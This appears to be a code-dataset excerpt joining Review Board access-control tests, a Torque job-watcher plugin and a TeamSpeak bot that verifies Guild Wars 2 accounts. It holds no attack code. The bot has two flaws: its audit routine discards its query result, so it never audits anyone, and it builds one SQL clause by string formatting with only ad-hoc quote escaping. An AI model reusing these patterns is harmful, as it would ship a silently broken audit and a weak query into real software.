attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request, draft=True,
active=False)
review_request2 = self.create_review_request(publish=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request2.pk,
'file_attachment_id': attachment.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_with_valid_diff_against_id(self):
"""Testing review_file_attachment access with valid diff-against
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
attachment2 = self.create_file_attachment(review_request)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_valid_diff_against_id_draft(self):
"""Testing review_file_attachment access with valid diff-against
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
attachment2 = self.create_file_attachment(review_request, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 200)
def test_review_file_attachment_access_with_invalid_diff_against_id(self):
"""Testing review_file_attachment access with invalid diff-against
attachment for review request
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
attachment2 = self.create_file_attachment(review_request2)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 404)
def test_review_file_attachment_access_invalid_diff_against_id_draft(self):
"""Testing review_file_attachment access with invalid diff-against
attachment for review request draft
"""
review_request = self.create_review_request(publish=True)
attachment = self.create_file_attachment(review_request)
review_request2 = self.create_review_request(publish=True)
attachment2 = self.create_file_attachment(review_request2, draft=True)
# Log in so that we can check against the draft.
username = review_request.submitter.username
self.client.login(username=username, password=<PASSWORD>)
response = self.client.get(
local_site_reverse(
'file-attachment',
kwargs={
'review_request_id': review_request.pk,
'file_attachment_id': attachment.pk,
'file_attachment_diff_id': attachment2.pk,
}))
self.assertEqual(response.status_code, 404)
def _get_context_var(self, response, varname):
for context in response.context:
if varname in context:
return context[varname]
return None
class CommentDiffFragmentsViewTests(TestCase):
"""Unit tests for the comment_diff_fragments view."""
fixtures = ['test_users', 'test_scmtools']
def test_get_with_unpublished_review_request_not_owner(self):
"""Testing comment_diff_fragments with unpublished review request and
user is not the owner
"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 403)
def test_get_with_unpublished_review_request_owner(self):
"""Testing comment_diff_fragments with unpublished review request and
user is the owner
"""
user = User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
submitter=user)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
@add_fixtures(['test_site'])
def test_get_with_published_review_request_local_site_access(self):
"""Testing comment_diff_fragments with published review request on
a Local Site the user has access to
"""
user = User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
with_local_site=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
review_request.local_site.users.add(user)
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/s/local-site-1/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.display_id, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
@add_fixtures(['test_site'])
def test_get_with_published_review_request_local_site_no_access(self):
"""Testing comment_diff_fragments with published review request on
a Local Site the user does not have access to
"""
User.objects.create_user(username='test-user',
password='<PASSWORD>')
review_request = self.create_review_request(create_repository=True,
with_local_site=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
self.assertTrue(self.client.login(username='test-user',
password='<PASSWORD>'))
response = self.client.get(
'/s/local-site-1/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.display_id, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 403)
def test_get_with_valid_comment_ids(self):
"""Testing comment_diff_fragments with valid comment ID"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment1 = self.create_diff_comment(review, filediff)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 2)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
self.assertEqual(response.context['comment_entries'][1]['comment'],
comment2)
def test_get_with_valid_and_invalid_comment_ids(self):
"""Testing comment_diff_fragments with mix of valid comment IDs and
comment IDs not found in database
"""
user = User.objects.create(username='reviewer')
review_request = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request, user=user)
comment = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/999,%d/'
% (review_request.pk, comment.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment)
def test_get_with_no_valid_comment_ids(self):
"""Testing comment_diff_fragments with no valid comment IDs"""
review_request = self.create_review_request(create_repository=True,
publish=True)
response = self.client.get(
'/r/%d/fragments/diff-comments/100,200,300/'
% review_request.pk)
self.assertEqual(response.status_code, 404)
def test_get_with_comment_ids_from_other_review_request(self):
"""Testing comment_diff_fragments with comment ID from another review
request
"""
user = User.objects.create(username='reviewer')
# Create the first review request and review.
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment1 = self.create_diff_comment(review, filediff)
review.publish()
# Create the second review request and review.
review_request2 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request2)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request2, user=user)
comment2 = self.create_diff_comment(review, filediff)
review.publish()
response = self.client.get(
'/r/%d/fragments/diff-comments/%d,%d/'
% (review_request1.pk, comment1.pk, comment2.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment1)
def test_get_with_comment_ids_from_draft_review_owner(self):
"""Testing comment_diff_fragments with comment ID from draft review,
accessed by the review's owner
"""
user = User.objects.create_user(username='reviewer',
password='<PASSWORD>')
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment = self.create_diff_comment(review, filediff)
self.assertTrue(self.client.login(username='reviewer',
password='<PASSWORD>'))
response = self.client.get(
'/r/%d/fragments/diff-comments/%d/'
% (review_request1.pk, comment.pk))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['comment_entries']), 1)
self.assertEqual(response.context['comment_entries'][0]['comment'],
comment)
def test_get_with_comment_ids_from_draft_review_not_owner(self):
"""Testing comment_diff_fragments with comment ID from draft review,
accessed by someone other than the review's owner
"""
user = User.objects.create(username='reviewer')
review_request1 = self.create_review_request(create_repository=True,
publish=True)
diffset = self.create_diffset(review_request1)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request1, user=user)
comment = self.create_diff_comment(review, filediff)
response = self.client.get(
'/r/%d/fragments/diff-comments/%d/'
% (review_request1.pk, comment.pk))
self.assertEqual(response.status_code, 404)
class DownloadFileTests(TestCase):
"""Tests for the download_*_file views."""
fixtures = ['test_users', 'test_scmtools']
@classmethod
def setUpClass(cls):
super(DownloadFileTests, cls).setUpClass()
register_hosting_service(TestService.name, TestService)
@classmethod
def tearDownClass(cls):
super(DownloadFileTests, cls).tearDownClass()
unregister_hosting_service(TestService.name)
def setUp(self):
super(DownloadFileTests, self).setUp()
self.account = HostingServiceAccount.objects.create(
service_name=TestService.name,
hosting_url='http://example.com/',
username='foo')
self.repository = self.create_repository(hosting_account=self.account)
self.review_request = self.create_review_request(
repository=self.repository, publish=True)
self.diffset = self.create_diffset(review_request=self.review_request)
self.filediff = self.create_filediff(self.diffset,
source_file='/invalid-path',
dest_file='/invalid-path')
def testing_download_orig_file_404(self):
"""Testing download_orig_file when the file cannot be found upstream"""
rsp = self.client.get(
local_site_reverse('download-orig-file', kwargs={
'review_request_id': self.review_request.display_id,
'revision': self.diffset.revision,
'filediff_id': self.filediff.pk,
}))
self.assertEquals(rsp.status_code, 404)
def testing_download_modified_file_404(self):
"""Testing download_modified_file when the file cannot be found
upstream
"""
rsp = self.client.get(
local_site_reverse('download-modified-file', kwargs={
'review_request_id': self.review_request.display_id,
'revision': self.diffset.revision,
'filediff_id': self.filediff.pk,
}))
self.assertEquals(rsp.status_code, 404)
class UserInfoboxTests(TestCase):
def test_unicode(self):
"""Testing user_infobox with a user with non-ascii characters"""
user = User.objects.create_user('test', '<EMAIL>')
user.first_name = 'Test\u21b9'
user.last_name = 'User\u2729'
user.save()
self.client.get(local_site_reverse('user-infobox', args=['test']))
```
|
{
"source": "jeyarajsiddhu/aws-parallelcluster-node",
"score": 2
}
|
#### File: jobwatcher/plugins/torque.py
```python
import logging
from common.schedulers.torque_commands import get_compute_nodes_info, get_pending_jobs_info
from .utils import get_optimal_nodes
log = logging.getLogger(__name__)
# get nodes requested from pending jobs
def get_required_nodes(instance_properties, max_size):
pending_jobs = get_pending_jobs_info(max_slots_filter=instance_properties.get("slots"))
logging.info("Found the following pending jobs:\n%s", pending_jobs)
slots_requested = []
nodes_requested = []
for job in pending_jobs:
if job.resources_list.nodes_resources:
for nodes, ppn in job.resources_list.nodes_resources:
nodes_requested.append(nodes)
slots_requested.append(ppn * nodes)
elif job.resources_list.ncpus:
nodes_requested.append(1)
slots_requested.append(job.resources_list.ncpus)
elif job.resources_list.nodes_count:
nodes_requested.append(job.resources_list.nodes_count)
slots_requested.append(1 * job.resources_list.nodes_count)
return get_optimal_nodes(nodes_requested, slots_requested, instance_properties)
# get nodes reserved by running jobs
def get_busy_nodes():
nodes = get_compute_nodes_info()
logging.info("Found the following compute nodes:\n%s", nodes)
busy_nodes = 0
for node in nodes.values():
# when a node is added it transitions from down,offline,MOM-list-not-sent -> down -> free
if node.jobs or (
any(state in ["state-unknown"] for state in node.state) and "MOM-list-not-sent" not in node.state
):
busy_nodes += 1
return busy_nodes
```
|
{
"source": "Jeybla/ts-gw2-verifyBot",
"score": 2
}
|
#### File: Jeybla/ts-gw2-verifyBot/TS3Bot.py
```python
import binascii # crc32
import datetime # for date strings
import json
import os # operating system commands -check if files exist
import sqlite3 # Database
import traceback
import urllib.parse # for fetching guild emblems urls
from threading import RLock
import requests # to download guild emblems
import schedule # Allows auditing of users every X days
import ts3 # teamspeak library
import Config
from StringShortener import StringShortener
from bot_messages import * # Import all Static messages the BOT may need
import Logger
log = Logger.getLogger()
def request(url):
response = requests.get(url, headers={"Content-Type": "application/json"})
if response.status_code == 200:
return json.loads(response.content.decode("utf-8"))
else:
return None
#######################################
def default_exception_handler(ex):
''' prints the trace and returns the exception for further inspection '''
traceback.print_exc()
return ex
def ignore_exception_handler(ex):
''' acts as if no exception was raised, equivalent to except: pass'''
return None
def signal_exception_handler(ex):
''' returns the exception without printing it, useful for expected exceptions, signaling that an exception occurred '''
return ex
#######################################
## Basic Classes
#######################################
class ThreadsafeDBConnection(object):
def __init__(self, db_name):
self.db_name = db_name
self.conn = sqlite3.connect(db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
self.cursor = self.conn.cursor()
self.lock = RLock()
class ThreadsafeTSConnection(object):
RETRIES = 3
@property
def uri(self):
return "telnet://%s:%s@%s:%s" % (self._user, self._password, self._host, str(self._port))
def __init__(self, user, password, host, port, keepalive_interval = None, server_id = None, bot_nickname = None):
'''
Creates a new threadsafe TS3 connection.
user: user to connect as
password: <PASSWORD>
host: host of TS3 server
port: port for server queries
keepalive_interval: interval in which the keepalive is sent to the ts3 server
server_id: the server id of the TS3 server we want to address, in case we have multiple.
Note that the server id HAS to be selected at some point, using the "use" command.
It has just been wrapped in here to allow for more convenient copying of the
TS3 connection where the appropriate server is selected automatically.
bot_nickname: nickname for the bot. Could be suffixed, see gentleRename. If None is passed,
no naming will take place.
'''
self._user = user
self._password = password
self._host = host
self._port = port
self._keepalive_interval = int(keepalive_interval)
self._server_id = server_id
self._bot_nickname = bot_nickname
self.lock = RLock()
self.ts_connection = None # done in init()
self.init()
def init(self):
if self.ts_connection is not None:
try:
self.ts_connection.close()
except:
pass # may already be closed, doesn't matter.
self.ts_connection = ts3.query.TS3ServerConnection(self.uri)
if self._keepalive_interval is not None:
schedule.cancel_job(self.keepalive) # to avoid accumulating keepalive calls during re-inits
schedule.every(self._keepalive_interval).seconds.do(self.keepalive)
if self._server_id is not None:
self.ts3exec(lambda tc: tc.exec_("use", sid=self._server_id))
if self._bot_nickname is not None:
self.forceRename(self._bot_nickname)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def keepalive(self):
self.ts3exec(lambda tc: tc.send_keepalive())
def ts3exec(self, handler, exception_handler = lambda ex: default_exception_handler(ex)): #eh = lambda ex: print(ex)):
'''
Excecutes a query() or exec_() on the internal TS3 connection.
handler: a function ts3.query.TS3ServerConnection -> any
exception_handler: a function Exception -> any. None will be interpreted as not having encountered an exception.
The default handler prints the stacktrace for the exception and returns the exception itself.
This changes the workflow of executing erroring code: instead of try-catching we need to
decompose the tuple returned from this function and check if the exception result is anything
but None. E.g.:
try:
res = ts3con.query(...)
except Exception as ex:
# error handling
becomes
res,ex = threadsafe_ts3con.ts3exec(lambda tc: tc.query(...))
if ex:
# error handling
Note that the exception handler is only executed iff an exception is actually
being handled!
returns a tuple with the results of the two handlers (result first, exception result second).
'''
reinit = False
with self.lock:
failed = True
fails = 0
res = None
exres = None
while failed and fails < ThreadsafeTSConnection.RETRIES:
failed = False
try:
res = handler(self.ts_connection)
except ts3.query.TS3TransportError:
failed = True
fails += 1
log.error("Critical error on transport level! Attempt %s to restart the connection and send the command again.", str(fails),)
reinit = True
except Exception as ex:
exres = exception_handler(ex)
if reinit:
self.init()
return (res, exres)
def close(self):
self.ts3exec(lambda tc: tc.close())
def copy(self):
tsc = ThreadsafeTSConnection(self._user, self._password, self._host, self._port, self._keepalive_interval, self._server_id, None)
# make sure to
# 1. not pass bot_nickname to the constructor, or the child (copy) would call forceRename and attempt to kick the parent
# 2. gently rename the copy afterwards
tsc.gentleRename(self._bot_nickname)
return tsc
def gentleRename(self, nickname):
'''
Renames self to nickname, but attaches a running counter
to the name if the nickname is already taken.
'''
i = 1
new_nick = "%s(%d)" % (nickname,i)
while not self.ts3exec(lambda tc: tc.query("clientfind", pattern=new_nick).first(), signal_exception_handler)[1]:
i += 1
new_nick = "%s(%d)" % (nickname,i)
new_nick = "%s(%d)" % (nickname,i)
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=new_nick))
self._bot_nickname = new_nick;
return self._bot_nickname
def forceRename(self, nickname):
'''
Attempts to forcefully rename self.
If the chosen nickname is already taken, the bot will attempt to kick that user.
If that fails the bot will fall back to gentle renaming itself.
'''
imposter,free = self.ts3exec(lambda tc: tc.query("clientfind", pattern=nickname).first(), signal_exception_handler) # check if nickname is already in use
if not free: # error occurs if no such user was found -> catching no exception means the name is taken
_,ex = self.ts3exec(lambda tc: tc.exec_("clientkick", reasonid=5, reasonmsg="Reserved Nickname", clid=imposter.get("clid")), signal_exception_handler)
if ex:
log.warning("Renaming self to '%s' after kicking existing user with reserved name failed. Warning: this usually only happens for serverquery logins, meaning you are running multiple bots or you are having stale logins from crashed bot instances on your server. Only restarts can solve the latter.", nickname)
else:
log.info("Kicked user who was using the reserved registration bot name '%s'.", nickname)
nickname = self.gentleRename(nickname)
log.info("Renamed self to '%s'.", nickname)
else:
self.ts3exec(lambda tc: tc.exec_("clientupdate", client_nickname=nickname))
log.info("Forcefully renamed self to '%s'.", nickname)
self._bot_nickname = nickname
return self._bot_nickname
class Bot:
@property
def ts_connection(self):
return self._ts_connection
def __init__(self, db, ts_connection, verified_group, bot_nickname = "TS3BOT"):
self._ts_connection = ts_connection
admin_data, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("whoami").first())
self.db_name = db
self.name = admin_data.get('client_login_name')
self.client_id = admin_data.get('client_id')
self.nickname = self.ts_connection.forceRename(bot_nickname)
self.verified_group = verified_group
self.vgrp_id = self.groupFind(verified_group)
self.getUserDatabase()
self.c_audit_date = datetime.date.today() # Todays Date
#Helps find the group ID for a group name
def groupFind(self, group_to_find):
self.groups_list, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergrouplist").all())
for group in self.groups_list:
if group.get('name') == group_to_find:
return group.get('sgid')
return -1
def clientNeedsVerify(self, unique_client_id):
client_db_id = self.getTsDatabaseID(unique_client_id)
#Check if user is in verified group
if any(perm_grp.get('name') == self.verified_group for perm_grp in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all())[0]):
return False #User already verified
#Check if user is authenticated in database and if so, re-adds them to the group
with self.dbc.lock:
current_entries = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (unique_client_id,)).fetchall()
if len(current_entries) > 0:
self.setPermissions(unique_client_id)
return False
return True #User not verified
def setPermissions(self, unique_client_id):
try:
client_db_id = self.getTsDatabaseID(unique_client_id)
log.debug("Adding Permissions: CLUID [%s] SGID: %s CLDBID: %s", unique_client_id, self.vgrp_id, client_db_id)
#Add user to group
_,ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupaddclient", sgid = self.vgrp_id, cldbid = client_db_id))
if ex:
log.error("Unable to add client to '%s' group. Does the group exist?", self.verified_group)
except ts3.query.TS3QueryError as err:
log.error("Setting permissions failed: %s", err) #likely due to bad client id
def removePermissions(self, unique_client_id):
try:
client_db_id = self.getTsDatabaseID(unique_client_id)
log.debug("Removing Permissions: CLUID [%s] SGID: %s CLDBID: %s", unique_client_id, self.vgrp_id, client_db_id)
#Remove user from group
_,ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = self.vgrp_id, cldbid = client_db_id), signal_exception_handler)
if ex:
log.error("Unable to remove client from '%s' group. Does the group exist and are they member of the group?", self.verified_group)
#Remove users from all groups, except the whitelisted ones
if Config.purge_completely:
# FIXME: remove channel groups as well
assigned_groups, ex = self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all())
for g in assigned_groups:
if g.get("name") not in Config.purge_whitelist:
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = g.get("sgid"), cldbid = client_db_id), lambda ex: None)
except ts3.query.TS3QueryError as err:
log.error("Removing permissions failed: %s", err) #likely due to bad client id
def removePermissionsByGW2Account(self, gw2account):
with self.dbc.lock:
tsDbIds = self.dbc.cursor.execute("SELECT ts_db_id FROM users WHERE account_name = ?", (gw2account,)).fetchall()
for tdi, in tsDbIds:
self.removePermissions(tdi)
log.debug("Removed permissions from %s", tdi)
self.dbc.cursor.execute("DELETE FROM users WHERE account_name = ?", (gw2account,))
changes = self.dbc.cursor.execute("SELECT changes()").fetchone()[0];
self.dbc.conn.commit()
return changes
def getUserDBEntry(self, client_unique_id):
'''
Retrieves the DB entry for a unique client ID.
Is either a dictionary of database-field-names to values, or None if no such entry was found in the DB.
'''
with self.dbc.lock:
entry = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (client_unique_id,)).fetchall()
if len(entry) < 1:
# user not registered
return None
entry = entry[0]
keys = self.dbc.cursor.description
assert len(entry) == len(keys)
return dict([(keys[i][0], entry[i]) for i in range(len(entry))])
def getUserDatabase(self):
if os.path.isfile(self.db_name):
self.dbc = ThreadsafeDBConnection(self.db_name) # sqlite3.connect(self.db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
log.info("Loaded User Database...")
else:
self.dbc = ThreadsafeDBConnection(self.db_name) # sqlite3.connect(self.db_name, check_same_thread = False, detect_types = sqlite3.PARSE_DECLTYPES)
# self.dbc.cursor = self.dbc.conn.cursor()
log.info("No User Database found...created new database!")
with self.dbc.lock:
# USERS
self.dbc.cursor.execute("CREATE TABLE users(ts_db_id text primary key, account_name text, api_key text, created_date date, last_audit_date date)")
# BOT INFO
self.dbc.cursor.execute("CREATE TABLE bot_info(version text, last_succesful_audit date)")
self.dbc.conn.commit()
self.dbc.cursor.execute('INSERT INTO bot_info (version, last_succesful_audit) VALUES (?,?)', (Config.current_version, datetime.date.today(), ))
self.dbc.conn.commit()
# GUILD INFO
self.dbc.cursor.execute('''CREATE TABLE guilds(
guild_id integer primary key autoincrement,
guild_name text UNIQUE,
ts_group text UNIQUE)''')
self.dbc.conn.commit()
# GUILD IGNORES
self.dbc.cursor.execute('''CREATE TABLE guild_ignores(
guild_ignore_id integer primary key autoincrement,
guild_id integer,
ts_db_id text,
ts_name text,
FOREIGN KEY(guild_id) REFERENCES guilds(guild_id),
UNIQUE(guild_id, ts_db_id))''')
self.dbc.conn.commit()
def TsClientLimitReached(self, gw_acct_name):
with self.dbc.lock:
current_entries = self.dbc.cursor.execute("SELECT * FROM users WHERE account_name=?", (gw_acct_name, )).fetchall()
return len(current_entries) >= Config.client_restriction_limit
def addUserToDB(self, client_unique_id, account_name, api_key, created_date, last_audit_date):
with self.dbc.lock:
client_id = self.getActiveTsUserID(client_unique_id)
client_exists = self.dbc.cursor.execute("SELECT * FROM users WHERE ts_db_id=?", (client_unique_id,)).fetchall()
if len(client_exists) > 1:
log.warning("Found multiple database entries for single unique teamspeakid %s.", client_unique_id)
if len(client_exists) != 0: # If client TS database id is in BOT's database.
self.dbc.cursor.execute("""UPDATE users SET ts_db_id=?, account_name=?, api_key=?, created_date=?, last_audit_date=? WHERE ts_db_id=?""", (client_unique_id, account_name, api_key, created_date, last_audit_date, client_unique_id))
log.info("Teamspeak ID %s already in Database updating with new Account Name '%s'. (likely permissions changed by a Teamspeak Admin)", client_unique_id, account_name)
else:
self.dbc.cursor.execute("INSERT INTO users ( ts_db_id, account_name, api_key, created_date, last_audit_date) VALUES(?,?,?,?,?)",(client_unique_id, account_name, api_key, created_date, last_audit_date))
self.dbc.conn.commit()
def removeUserFromDB(self, client_db_id):
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM users WHERE ts_db_id=?", (client_db_id,))
self.dbc.conn.commit()
#def updateGuildTags(self, client_db_id, auth):
def updateGuildTags(self, user, auth):
if auth.guilds_error:
log.error("Did not update guild groups for player '%s', as loading the guild groups caused an error.", auth.name)
return
uid = user.unique_id # self.getTsUniqueID(client_db_id)
client_db_id = user.ts_db_id
ts_groups = {sg.get("name"):sg.get("sgid") for sg in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergrouplist").all())[0]}
ingame_member_of = set(auth.guild_names)
# names of all groups the user is in, not just guild ones
current_group_names = []
try:
current_group_names = [g.get("name") for g in self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("servergroupsbyclientid", cldbid = client_db_id).all(), signal_exception_handler)[0]]
except TypeError as e:
# user had no groups (results in None, instead of an empty list) -> just stick with the []
pass
# data of all guild groups the user is in
param = ",".join(["'%s'" % (cgn.replace('"', '\\"').replace("'", "\\'"),) for cgn in current_group_names])
# sanitisation is restricted to replacing single and double quotes. This should not be that much of a problem, since
# the input for the parameters here are the names of our own server groups on our TS server.
current_guild_groups = []
hidden_groups = {}
with self.dbc.lock:
current_guild_groups = self.dbc.cursor.execute("SELECT ts_group, guild_name FROM guilds WHERE ts_group IN (%s)" % (param,)).fetchall()
# groups the user doesn't want to wear
hidden_groups = set([g[0] for g in self.dbc.cursor.execute("SELECT g.ts_group FROM guild_ignores AS gi JOIN guilds AS g ON gi.guild_id = g.guild_id WHERE ts_db_id = ?", (uid,))])
# REMOVE STALE GROUPS
for ggroup, gname in current_guild_groups:
if ggroup in hidden_groups:
log.info("Player %s chose to hide group '%s', which is now removed.", auth.name, ggroup)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = ts_groups[ggroup], cldbid = client_db_id))
elif not gname in ingame_member_of:
if ggroup not in ts_groups:
log.warning("Player %s should be removed from the TS group '%s' because they are not a member of guild '%s'. But no matching group exists. You should remove the entry for this guild from the db or check the spelling of the TS group in the DB. Skipping.", ggroup, auth.name, gname)
else:
log.info("Player %s is no longer part of the guild '%s'. Removing attached group '%s'.", auth.name, gname, ggroup)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupdelclient", sgid = ts_groups[ggroup], cldbid = client_db_id))
# ADD DUE GROUPS
for g in ingame_member_of:
ts_group = None
with self.dbc.lock:
ts_group = self.dbc.cursor.execute("SELECT ts_group FROM guilds WHERE guild_name = ?", (g,)).fetchone()
if ts_group:
ts_group = ts_group[0] # first and only column, if a row exists
if ts_group not in current_group_names:
if ts_group in hidden_groups:
log.info("Player %s is entitled to TS group '%s', but chose to hide it. Skipping.", auth.name, ts_group)
else:
if ts_group not in ts_groups:
log.warning("Player %s should be assigned the TS group '%s' because they are member of guild '%s'. But the group does not exist. You should remove the entry for this guild from the db or create the group. Skipping.", auth.name, ts_group, g)
else:
log.info("Player %s is member of guild '%s' and will be assigned the TS group '%s'.", auth.name, g, ts_group)
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("servergroupaddclient", sgid = ts_groups[ts_group], cldbid = client_db_id))
def auditUsers(self):
import threading
threading.Thread(target=self._auditUsers).start()
def _auditUsers(self):
self.c_audit_date = datetime.date.today() #Update current date everytime run
self.db_audit_list = []
with self.dbc.lock:
self.dbc.cursor.execute('SELECT * FROM users').fetchall()
for audit_user in self.db_audit_list:
#Convert to single variables
audit_ts_id = audit_user[0]
audit_account_name = audit_user[1]
audit_api_key = audit_user[2]
audit_created_date = audit_user[3]
audit_last_audit_date = audit_user[4]
log.debug("Audit: User %s", audit_account_name)
log.debug("TODAY |%s| NEXT AUDIT |%s|", self.c_audit_date, audit_last_audit_date + datetime.timedelta(days = Config.audit_period))
#compare audit date
if self.c_audit_date >= audit_last_audit_date + datetime.timedelta(days = Config.audit_period):
log.info("User %s is due for auditing!", audit_account_name)
auth = TS3Auth.AuthRequest(audit_api_key, audit_account_name)
if auth.success:
log.info("User %s is still on %s. Succesful audit!", audit_account_name, auth.world.get("name"))
#self.getTsDatabaseID(audit_ts_id)
self.updateGuildTags(User(self.ts_connection, unique_id = audit_ts_id), auth)
with self.dbc.lock:
self.dbc.cursor.execute("UPDATE users SET last_audit_date = ? WHERE ts_db_id= ?", (self.c_audit_date, audit_ts_id,))
self.dbc.conn.commit()
else:
log.info("User %s is no longer on our server. Removing access....", audit_account_name)
self.removePermissions(audit_ts_id)
self.removeUserFromDB(audit_ts_id)
with self.dbc.lock:
self.dbc.cursor.execute('INSERT INTO bot_info (last_succesful_audit) VALUES (?)', (self.c_audit_date,))
self.dbc.conn.commit()
def broadcastMessage(self):
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("sendtextmessage", targetmode = 2, target = self._ts_connection._server_id, msg = Config.locale.get("bot_msg_broadcast")))
def getActiveTsUserID(self, client_unique_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetids", cluid = client_unique_id).first().get('clid'))[0]
def getTsDatabaseID(self, client_unique_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetdbidfromuid", cluid = client_unique_id).first().get('cldbid'))[0]
def getTsUniqueID(self, client_db_id):
return self.ts_connection.ts3exec(lambda ts_connection: ts_connection.query("clientgetnamefromdbid", cldbid = client_db_id).first().get('cluid'))[0]
def loginEventHandler(self, event):
raw_sgroups = event.parsed[0].get('client_servergroups')
